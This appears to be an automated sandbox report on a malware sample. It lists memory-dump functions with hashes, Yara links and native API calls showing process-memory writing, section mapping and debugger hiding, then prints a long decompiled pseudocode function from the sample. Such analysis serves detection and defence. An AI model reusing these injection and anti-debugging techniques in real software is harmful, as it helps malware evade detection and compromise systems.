Opcode ID: d85da8bf7d05d4de1c247bf3b9f4521c7356350666423e7b1004d6e315606ced
Instruction ID: 8cd2bd6897691937ea68410f4a1e1928c2f78f11befeb358715820c9e94e98a5
Opcode Fuzzy Hash: d85da8bf7d05d4de1c247bf3b9f4521c7356350666423e7b1004d6e315606ced
Instruction Fuzzy Hash: 3B51E3706C0289AEFF362E10CED1BEA366AAF15754F544128FE969A1D1C3B998C49F40

Uniqueness

Uniqueness Score: -1.00%

Function 02182727, Relevance: 1.7, APIs: 1, Instructions: 176nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02182960

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: e77ef02ea5a2db149098f94871a1262079e994dfb30697d85f5fc8ab779315d1
Instruction ID: 5676bf1cbea7b6e8760a0a4bb4aa5c431fbceb9ff2590536d4ac51c4db79a727
Opcode Fuzzy Hash: e77ef02ea5a2db149098f94871a1262079e994dfb30697d85f5fc8ab779315d1
Instruction Fuzzy Hash: 80510F706C4289AFFF266E20CED1BEA366ABF15714F140129FE959A1D1C3B58488CF44

Uniqueness

Uniqueness Score: -1.00%

Function 02182773, Relevance: 1.7, APIs: 1, Instructions: 157nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02182960

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: cc9d628114f0c0b8ce41c63d89ae5a6ad63cb4ff9a0e12bc49e5e5457af78640
Instruction ID: 138c67472d75d9db0124946745a0e8b19cf24e827fc5b60b3359f0d68a03db69
Opcode Fuzzy Hash: cc9d628114f0c0b8ce41c63d89ae5a6ad63cb4ff9a0e12bc49e5e5457af78640
Instruction Fuzzy Hash: 9651F1706C0289AFFF262E10DED1BEA366ABF15754F540128FE959A1D1C7B988C89F00

Uniqueness

Uniqueness Score: -1.00%

Function 021827A3, Relevance: 1.7, APIs: 1, Instructions: 152nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02182960

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 60904522a8536ed3ffce71ebbdbb8d2bb3eaa3358061157b3b2205d4951de90f
Instruction ID: 31b026d83a7c9822e3941c70f93d95b42d469bf68bf9e48b27560d3be46f7e4e
Opcode Fuzzy Hash: 60904522a8536ed3ffce71ebbdbb8d2bb3eaa3358061157b3b2205d4951de90f
Instruction Fuzzy Hash: 6C4104706C0289AFFB272E20CED1BEA366ABF05714F554128FE959A1D1C3B58888CF00

Uniqueness

Uniqueness Score: -1.00%

Function 02182822, Relevance: 1.6, APIs: 1, Instructions: 128nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02182960

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: c6cc7ec8461d9bf8118546583aea7b122135ba0b7b4364035cecdc08ad9d26fe
Instruction ID: 8a1121bf30e5629c9cef5072bad7308a246f2f55806afbbd23461f16b24d7dcb
Opcode Fuzzy Hash: c6cc7ec8461d9bf8118546583aea7b122135ba0b7b4364035cecdc08ad9d26fe
Instruction Fuzzy Hash: BF41F574AC4289AFFF277E60DED07E93A5ABF15354F584128FE958A081C7B54488CF00

Uniqueness

Uniqueness Score: -1.00%

Function 02186145, Relevance: 1.6, APIs: 1, Instructions: 118nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02182537,?,00000000,00000000,?), ref: 0218068B
NtMapViewOfSection.NTDLL ref: 021863B2

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: InformationSectionThreadView
String ID:
API String ID: 190281133-0
Opcode ID: 80c877c5d6aae432ee08ba4df55dcaeedff7307c64473b60d33f4d4711816cd6
Instruction ID: 8d0b212702198912b9e529f37505350ba80cabdef489723272ab205e5678a7a6
Opcode Fuzzy Hash: 80c877c5d6aae432ee08ba4df55dcaeedff7307c64473b60d33f4d4711816cd6
Instruction Fuzzy Hash: 5F31FB206846C5CEDF2E7F24C5D47B97BEFAF46314F96416ACD7686195C3348484CE42

Uniqueness

Uniqueness Score: -1.00%

Function 02186161, Relevance: 1.6, APIs: 1, Instructions: 112nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02182537,?,00000000,00000000,?), ref: 0218068B
NtMapViewOfSection.NTDLL ref: 021863B2

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: InformationSectionThreadView
String ID:
API String ID: 190281133-0
Opcode ID: 2dabf02510ae91384fd771eccdb0c7840c5abf7c0c0b94119256d752780d9293
Instruction ID: 834d0b9f1744b5745921cdd6a1ed491c92241b88c955ed7e491b5983086f0e3c
Opcode Fuzzy Hash: 2dabf02510ae91384fd771eccdb0c7840c5abf7c0c0b94119256d752780d9293
Instruction Fuzzy Hash: BD31B6206C86C5CEDB2E7F24C5D47B97BEEAF46314F5601AACD768A295C3748484CF42

Uniqueness

Uniqueness Score: -1.00%

Function 021861B5, Relevance: 1.6, APIs: 1, Instructions: 106nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL ref: 021863B2

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: cdbab529db2654a426d6521ecdfd6269c4ce06964b3a4ad7cebe721d032b0ff3
Instruction ID: 376c6548b5f5bcbe0046a809229ade6145ff8d947b9bc9e0c9c4cf8af6b420c1
Opcode Fuzzy Hash: cdbab529db2654a426d6521ecdfd6269c4ce06964b3a4ad7cebe721d032b0ff3
Instruction Fuzzy Hash: 1A31F7205883C5CEDB2EAF24C9D47B97FAEEF46214F5901DACD758A1D5C3648489CF42

Uniqueness

Uniqueness Score: -1.00%

Function 02182873, Relevance: 1.6, APIs: 1, Instructions: 102nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02182537,?,00000000,00000000,?), ref: 0218068B
NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02182960

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: InformationMemoryThreadVirtualWrite
String ID:
API String ID: 1809272239-0
Opcode ID: 48857a37ac2a93d93244f1abc4d9826fcd337397cf16f76897792c940af50b76
Instruction ID: b8cb0630076e1065645bdaaa0de68a6a6f93ed2c5474fb3865a3f0082327200e
Opcode Fuzzy Hash: 48857a37ac2a93d93244f1abc4d9826fcd337397cf16f76897792c940af50b76
Instruction Fuzzy Hash: 5431F670AC0289AFFF267E20CED1BEA366BFF14354F544028FE895A180C7B554988F40

Uniqueness

Uniqueness Score: -1.00%

Function 02186197, Relevance: 1.6, APIs: 1, Instructions: 100nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL ref: 021863B2

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5c9321eb10018e03be6d0f32a0931dcfebaaf4847a0cc8bcf9fed6fc4428564d
Instruction ID: 524b37e7313643efd7bbc4dce819695c5f65680e38fd2559edde94f4150a1a8a
Opcode Fuzzy Hash: 5c9321eb10018e03be6d0f32a0931dcfebaaf4847a0cc8bcf9fed6fc4428564d
Instruction Fuzzy Hash: C931E4306882C5CEDB2D7F24C8D47B97BAEAF46314F96019ACD768A295C3348488CF42

Uniqueness

Uniqueness Score: -1.00%

Function 02186281, Relevance: 1.6, APIs: 1, Instructions: 90nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL ref: 021863B2

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 1d0ecfb56c5c5ad99819c2be23c52404d3aa946bb633abd5c170e3b1eddeee82
Instruction ID: d5a7b675e0b1d7540f4cac90402c26bdff50630b48b21190313f350bfc62d51b
Opcode Fuzzy Hash: 1d0ecfb56c5c5ad99819c2be23c52404d3aa946bb633abd5c170e3b1eddeee82
Instruction Fuzzy Hash: 6721D62498D3C6DEDB1AAB24C5D876A7FADEF42218F4E00DECDA58A5D6C7604488CF11

Uniqueness

Uniqueness Score: -1.00%

Function 021828CA, Relevance: 1.6, APIs: 1, Instructions: 85nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,02182537,?,00000000,00000000,?), ref: 0218068B
NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02182960

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: InformationMemoryThreadVirtualWrite
String ID:
API String ID: 1809272239-0
Opcode ID: e067b3cddbb19e5a8c5794d97a34905d22388b22adca6656edbe40c61587bd96
Instruction ID: 2b5786a9a59179900b3b727280c98af6b334ad2b3d5bbd8a8788923b7f88ac66
Opcode Fuzzy Hash: e067b3cddbb19e5a8c5794d97a34905d22388b22adca6656edbe40c61587bd96
Instruction Fuzzy Hash: 40213874A84289AFEF2A7E20CED1BE9376BFF55310F544128FD4986081C7758898CF40

Uniqueness

Uniqueness Score: -1.00%

Function 021861F5, Relevance: 1.6, APIs: 1, Instructions: 84nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL ref: 021863B2

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 7deeb0ff37e07c36d18220e930a70d7157228a8a2f0a7077a823bb53f84c9a90
Instruction ID: 6402e79e6f0e3876aa886332df9898278a87383152bff0000ae4ab35ee273788
Opcode Fuzzy Hash: 7deeb0ff37e07c36d18220e930a70d7157228a8a2f0a7077a823bb53f84c9a90
Instruction Fuzzy Hash: 1121C4206846C5CEDB2E7F24C4D47BA7BEEAF46314F9A119ACD764A294C3748484CF42

Uniqueness

Uniqueness Score: -1.00%

Function 02186210, Relevance: 1.6, APIs: 1, Instructions: 83nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL ref: 021863B2

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 0d38826f6fe9afc6a8a5fac27cee5c11bb3ddb5aa25c83b13c94ef04f26dc946
Instruction ID: 073f0418b763c36b684a277c22856365154e824417045502fbffe07397342302
Opcode Fuzzy Hash: 0d38826f6fe9afc6a8a5fac27cee5c11bb3ddb5aa25c83b13c94ef04f26dc946
Instruction Fuzzy Hash: BA21B6205882C5CEDB2EBF24C5D47BA7FAEAF46314F9A119ACD754A1D5C3748484CF42

Uniqueness

Uniqueness Score: -1.00%

Function 021830FC, Relevance: 1.6, APIs: 1, Instructions: 79libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00000034,02183BB5,02183D79,?,455E73D1,02182FC7,021806CA), ref: 02183AD5

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f40a4630aa162366d88a970e428ad616d3f25ccb3a5b87774a06de9110af3e77
Instruction ID: 4f7a4e0448c6e1c48df0e1fcea0c12d867129cca4a98d326086cbd924da3533e
Opcode Fuzzy Hash: f40a4630aa162366d88a970e428ad616d3f25ccb3a5b87774a06de9110af3e77
Instruction Fuzzy Hash: A721FF7548E3D68AC722EB7486D839ABFA9BF03604F1C84CDC8E149093C7A59419DB96

Uniqueness

Uniqueness Score: -1.00%

Function 02186239, Relevance: 1.6, APIs: 1, Instructions: 78nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL ref: 021863B2

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 9181a4536c03105425c1ecc17900d2adb7fce17c861cc48ba46957df5ea33e32
Instruction ID: e812b4e749ebb0815fba35a16ef91d09fcb1baa23214ae24acd3b6d30fd31074
Opcode Fuzzy Hash: 9181a4536c03105425c1ecc17900d2adb7fce17c861cc48ba46957df5ea33e32
Instruction Fuzzy Hash: 7A21C6205882C5CEDB2E7F14C5D47B97BEDAF46314F9A1199CC764A195C37484C5CF42

Uniqueness

Uniqueness Score: -1.00%

Function 0218290F, Relevance: 1.6, APIs: 1, Instructions: 70nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02182960

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: dbc90802eb4e2e8d30f346230624f9e35c4fafc2a89998b4667215f9c1180210
Instruction ID: e094214663591494fac9f58c0513ea7d39712970e75f9675694dac7498f4c002
Opcode Fuzzy Hash: dbc90802eb4e2e8d30f346230624f9e35c4fafc2a89998b4667215f9c1180210
Instruction Fuzzy Hash: 6D21E474A80289AFEF2A6E20CED1BEA776BBF54350F444118FE4946091C7798898DF40

Uniqueness

Uniqueness Score: -1.00%

Function 02186263, Relevance: 1.6, APIs: 1, Instructions: 69nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL ref: 021863B2

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 13153ee20519b6a62484b1f8a13d9636fd52671cb5d0d5238857225946f0e2d4
Instruction ID: 4ef6329cb49cd1bdf607b4a1f40c832478ed9ad26ce04b67431d51456c114f4f
Opcode Fuzzy Hash: 13153ee20519b6a62484b1f8a13d9636fd52671cb5d0d5238857225946f0e2d4
Instruction Fuzzy Hash: AD1193205882C5CEDB2EBF24C5D87BA7FADAF46219F99519ACC754A195C3708484CF42

Uniqueness

Uniqueness Score: -1.00%

Function 02186315, Relevance: 1.5, APIs: 1, Instructions: 42nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL ref: 021863B2

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: b8f70c85a5bfbdee6750cabcab90aeb1b02b76b49781d1f2b91aac833db8433f
Instruction ID: dc79c18c9ab97f9694d8fb07e6701631aa4723284733a78353cf69455f4731a1
Opcode Fuzzy Hash: b8f70c85a5bfbdee6750cabcab90aeb1b02b76b49781d1f2b91aac833db8433f
Instruction Fuzzy Hash: 39F052106CD3D2CAD70EBB7496E43BB2F2E9F4320878D048D8EBB8A294C7100488CF01

Uniqueness

Uniqueness Score: -1.00%

Function 02186353, Relevance: 1.5, APIs: 1, Instructions: 42nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL ref: 021863B2

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 154642d6b5752dbb4d52f3c1df3542818f969f9e80eb4191e474d555a7d012b3
Instruction ID: 9ed300ffceb52040433956c54438b4a118b4c4a234d95d6bad4a563df7e4595d
Opcode Fuzzy Hash: 154642d6b5752dbb4d52f3c1df3542818f969f9e80eb4191e474d555a7d012b3
Instruction Fuzzy Hash: 2AF02E2428E3DA8AD70EBB34A6C43B92F6EEE4360838D01CD8EE29A9D5C3010048CB10

Uniqueness

Uniqueness Score: -1.00%

Function 02186328, Relevance: 1.5, APIs: 1, Instructions: 41nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL ref: 021863B2

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 80115b5e9a527e7ef82ced6b2bd3f7731135b778d90880c0b1ab290973c5bcce
Instruction ID: a090218ee8848ee264e8f4de7da8fd2393e1f9413ba91c99f00746ad9d375972
Opcode Fuzzy Hash: 80115b5e9a527e7ef82ced6b2bd3f7731135b778d90880c0b1ab290973c5bcce
Instruction Fuzzy Hash: 5BF0E2102CD3D6DAD70EBB7495D53BB2F1E9F5320878E01898E769A194C7100448CF11

Uniqueness

Uniqueness Score: -1.00%

Function 0218633D, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL ref: 021863B2

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 1dc9ce3950833dd83eb011bb5b700f555ea2670b0404e2f0710301a6eb250728
Instruction ID: 34448c78e1e9b23e3b9aadfd0f3f3db087c605c12d475d00b6d393cc191f630c
Opcode Fuzzy Hash: 1dc9ce3950833dd83eb011bb5b700f555ea2670b0404e2f0710301a6eb250728
Instruction Fuzzy Hash: 78F0E21028D3D6C9D70EBB7495D53BA2F1EAE4320878D01898E768A194C7100448CB10

Uniqueness

Uniqueness Score: -1.00%

Function 02186387, Relevance: 1.5, APIs: 1, Instructions: 27nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL ref: 021863B2

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 32021bb45c2ef72fdef401e3bcc111590570b709c89eeb4e96e1a4f95c0cd5d9
Instruction ID: 50d7eddcc4df236f3da0908363f8caed9b6c1cc720fa8309f4ded61057c54565
Opcode Fuzzy Hash: 32021bb45c2ef72fdef401e3bcc111590570b709c89eeb4e96e1a4f95c0cd5d9
Instruction Fuzzy Hash: 2CE0DF2028939689D70EBF60D1C52BA2E1EEE8260838C108C9E6599158D3100448CB10

Uniqueness

Uniqueness Score: -1.00%

Function 02185CF0, Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,02185908,00000040,021824A6,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02185D0B

Memory Dump Source

Source File: 00000000.00000002.674395366.0000000002180000.00000040.00000001.sdmp, Offset: 02180000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 75c09cfe325803e34e037c116c9d09ad36d850219469c449fad797165fa8f00d
Instruction ID: fab1b7d68f24a7d1b20d0b53f8aedc311a846d4d8fe993ec6f143d494d9e4726
Opcode Fuzzy Hash: 75c09cfe325803e34e037c116c9d09ad36d850219469c449fad797165fa8f00d
Instruction Fuzzy Hash: 73C012E12240002F68048A28CD58C6BB3AA86D5A28B50C32DB872222CCC930EC088036

Uniqueness

Uniqueness Score: -1.00%

Function 00417CD5, Relevance: 338.3, APIs: 182, Strings: 10, Instructions: 2311
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E00417CD5(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				char _v32;
				short _v36;
				void* _v52;
				long long _v60;
				intOrPtr* _v64;
				void* _v80;
				intOrPtr _v84;
				signed int _v88;
				short _v92;
				void* _v108;
				long long _v116;
				signed int _v120;
				signed int _v124;
				char _v128;
				char _v132;
				char _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				char _v152;
				char _v156;
				char _v164;
				char _v172;
				intOrPtr _v180;
				char _v188;
				char _v204;
				intOrPtr _v212;
				char _v220;
				char* _v228;
				intOrPtr _v236;
				char* _v244;
				intOrPtr _v252;
				char* _v260;
				intOrPtr _v268;
				char* _v276;
				intOrPtr _v284;
				void* _v288;
				char _v292;
				char _v296;
				char _v300;
				char _v304;
				signed int _v308;
				char _v312;
				signed int _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				char _v336;
				char _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				intOrPtr* _v380;
				signed int _v384;
				intOrPtr* _v388;
				signed int _v392;
				signed int _v396;
				signed int _v408;
				char _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				intOrPtr* _v452;
				signed int _v456;
				intOrPtr* _v460;
				signed int _v464;
				intOrPtr* _v468;
				signed int _v472;
				intOrPtr* _v476;
				signed int _v480;
				signed int _v484;
				intOrPtr* _v488;
				signed int _v492;
				signed int _v496;
				intOrPtr* _v500;
				signed int _v504;
				intOrPtr* _v508;
				signed int _v512;
				signed int _v516;
				intOrPtr* _v520;
				signed int _v524;
				intOrPtr* _v528;
				signed int _v532;
				signed int _v536;
				intOrPtr* _v540;
				signed int _v544;
				intOrPtr* _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				intOrPtr* _v564;
				signed int _v568;
				intOrPtr* _v572;
				signed int _v576;
				intOrPtr* _v580;
				signed int _v584;
				intOrPtr* _v588;
				signed int _v592;
				intOrPtr* _v596;
				signed int _v600;
				intOrPtr* _v604;
				signed int _v608;
				signed int _v612;
				intOrPtr* _v616;
				signed int _v620;
				intOrPtr* _v624;
				signed int _v628;
				intOrPtr* _v632;
				signed int _v636;
				intOrPtr* _v640;
				signed int _v644;
				signed int _v648;
				intOrPtr* _v652;
				signed int _v656;
				intOrPtr* _v660;
				signed int _v664;
				intOrPtr* _v668;
				signed int _v672;
				intOrPtr* _v676;
				signed int _v680;
				intOrPtr* _v684;
				signed int _v688;
				intOrPtr* _v692;
				signed int _v696;
				signed int _v700;
				intOrPtr* _v704;
				signed int _v708;
				intOrPtr* _v712;
				signed int _v716;
				intOrPtr* _v720;
				signed int _v724;
				intOrPtr* _v728;
				signed int _v732;
				signed int _v736;
				intOrPtr* _v740;
				signed int _v744;
				intOrPtr* _v748;
				signed int _v752;
				intOrPtr* _v756;
				signed int _v760;
				intOrPtr* _v764;
				signed int _v768;
				intOrPtr* _v772;
				signed int _v776;
				signed int _v780;
				signed int _v784;
				signed int _t1162;
				signed int _t1166;
				signed int _t1170;
				signed int _t1174;
				signed int _t1178;
				signed int _t1182;
				signed int _t1186;
				signed int _t1190;
				signed int _t1201;
				signed int _t1210;
				signed int _t1214;
				signed int _t1219;
				signed int _t1223;
				signed int _t1227;
				signed int _t1231;
				signed int _t1235;
				signed int _t1241;
				signed int _t1247;
				signed int _t1251;
				signed int _t1261;
				signed int _t1265;
				signed int _t1280;
				signed int _t1284;
				signed int _t1288;
				signed int _t1292;
				signed int _t1296;
				signed int _t1307;
				signed int _t1313;
				signed int _t1323;
				signed int _t1327;
				signed int _t1331;
				signed int _t1335;
				signed int _t1339;
				signed int _t1343;
				signed int _t1347;
				signed int _t1351;
				char* _t1355;
				signed int _t1359;
				char* _t1363;
				signed int _t1367;
				signed int _t1380;
				signed int _t1392;
				signed int _t1396;
				signed int _t1400;
				signed int _t1404;
				signed int _t1417;
				signed int _t1421;
				signed int _t1426;
				signed int _t1430;
				signed int _t1433;
				signed int _t1445;
				signed int _t1457;
				signed int _t1461;
				signed int _t1465;
				signed int _t1469;
				signed int _t1473;
				signed int _t1477;
				signed int _t1496;
				signed int _t1500;
				signed int _t1505;
				signed int _t1509;
				signed int _t1513;
				signed int _t1517;
				char* _t1525;
				signed int _t1538;
				signed int _t1542;
				signed int _t1546;
				signed int _t1551;
				signed int _t1555;
				signed int _t1559;
				signed int _t1563;
				char* _t1571;
				signed int _t1585;
				signed int _t1589;
				signed int _t1594;
				signed int _t1598;
				signed int _t1602;
				signed int _t1606;
				signed int _t1610;
				signed int _t1614;
				signed int _t1618;
				signed int _t1637;
				signed int _t1641;
				signed int _t1645;
				signed int _t1649;
				signed int _t1660;
				signed int _t1669;
				intOrPtr* _t1670;
				intOrPtr _t1684;
				intOrPtr _t1695;
				intOrPtr _t1700;
				intOrPtr _t1704;
				intOrPtr _t1731;
				intOrPtr _t1769;
				intOrPtr _t1778;
				void* _t1835;
				void* _t1837;
				intOrPtr _t1838;
				intOrPtr* _t1840;
				void* _t1841;
				void* _t1842;
				void* _t1844;
				void* _t1845;
				void* _t1846;
				void* _t1848;
				void* _t1849;
				long long* _t1850;
				void* _t1852;
				long long* _t1853;
				void* _t1855;
				void* _t1856;

				_t1838 = _t1837 - 0xc;
				 *[fs:0x0] = _t1838;
				L00401420();
				_v16 = _t1838;
				_v12 = 0x401198;
				_v8 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401426, _t1835);
				if( *0x41e010 != 0) {
					_v452 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v452 = 0x41e010;
				}
				_t1162 =  &_v132;
				L004015B8();
				_v348 = _t1162;
				_v228 = 0x80020004;
				_v236 = 0xa;
				L00401420();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t1166 =  *((intOrPtr*)( *_v348 + 0x1c8))(_v348, 0x10, _t1162,  *((intOrPtr*)( *((intOrPtr*)( *_v452)) + 0x300))( *_v452));
				asm("fclex");
				_v352 = _t1166;
				if(_v352 >= 0) {
					_v456 = _v456 & 0x00000000;
				} else {
					_push(0x1c8);
					_push(0x40a0f4);
					_push(_v348);
					_push(_v352);
					L004015AC();
					_v456 = _t1166;
				}
				L004015A6();
				if( *0x41e010 != 0) {
					_v460 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v460 = 0x41e010;
				}
				_t1170 =  &_v132;
				L004015B8();
				_v348 = _t1170;
				_t1174 =  *((intOrPtr*)( *_v348 + 0x70))(_v348,  &_v308, _t1170,  *((intOrPtr*)( *((intOrPtr*)( *_v460)) + 0x300))( *_v460));
				asm("fclex");
				_v352 = _t1174;
				if(_v352 >= 0) {
					_v464 = _v464 & 0x00000000;
				} else {
					_push(0x70);
					_push(0x40a0f4);
					_push(_v348);
					_push(_v352);
					L004015AC();
					_v464 = _t1174;
				}
				if( *0x41e010 != 0) {
					_v468 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v468 = 0x41e010;
				}
				_t1178 =  &_v136;
				L004015B8();
				_v356 = _t1178;
				_t1182 =  *((intOrPtr*)( *_v356 + 0x130))(_v356,  &_v140, _t1178,  *((intOrPtr*)( *((intOrPtr*)( *_v468)) + 0x308))( *_v468));
				asm("fclex");
				_v360 = _t1182;
				if(_v360 >= 0) {
					_v472 = _v472 & 0x00000000;
				} else {
					_push(0x130);
					_push(0x40a120);
					_push(_v356);
					_push(_v360);
					L004015AC();
					_v472 = _t1182;
				}
				if( *0x41e010 != 0) {
					_v476 = 0x41e010;
				} else {
					_push(0x41e010);
					_push(0x407448);
					L004015B2();
					_v476 = 0x41e010;
				}
				_t1684 =  *((intOrPtr*)( *_v476));
				_t1186 =  &_v144;
				L004015B8();
				_v364 = _t1186;
				_t1190 =  *((intOrPtr*)( *_v364 + 0x158))(_v364,  &_v120, _t1186,  *((intOrPtr*)(_t1684 + 0x310))( *_v476));
				asm("fclex");
				_v368 = _t1190;
				if(_v368 >= 0) {
					_v480 = _v480 & 0x00000000;
				} else {
					_push(0x158);
					_push(0x40a120);
					_push(_v364);
					_push(_v368);
					L004015AC();
					_v480 = _t1190;
				}
